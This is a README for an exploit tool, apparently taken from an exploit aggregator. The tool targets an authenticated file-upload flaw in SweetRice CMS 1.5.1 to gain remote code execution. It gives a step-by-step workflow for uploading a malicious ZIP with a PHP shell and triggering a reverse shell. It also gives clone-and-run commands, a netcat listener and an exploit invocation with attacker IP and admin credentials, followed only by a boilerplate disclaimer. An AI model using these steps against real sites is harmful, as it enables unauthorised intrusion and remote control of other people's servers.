Share
## https://sploitus.com/exploit?id=3FD67986-CF86-56DF-8234-6CCD0A5495BF
# SweetRice CMS 1.5.1 RCE Exploit
## Overview

SweetRice CMS 1.5.1 authenticated file upload vulnerability leading to remote code execution.
Requirements
bash

## Workflow

- Authenticate to CMS admin panel
- Upload malicious ZIP via media center
- CMS auto-extracts ZIP
- Find uploaded PHP shell
- Trigger reverse shell

### Setup
```bash
git clone https://github.com/weekevy/SweetRice1.5.1-Authenticated-RCE-Exploit
cd SweetRice1.5.1-Authenticated-RCE-Exploit
pip3 install -r Requirements.txt
python3 exploit.py
```
### Usage
- Open reverse shell listener
```bash
nc -lvnp 4444
```
- Run Exploit
```bash
python3 exploit.py \
    --target-ip TARGET_IP \
    --username admin \
    --password admin123 \
    --attacker-ip ATTACKER_IP \
    --port 4444 \
    --zip shell.php
```
# Disclaimer
This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes ONLY. The author assumes NO LIABILITY for any misuse of this software.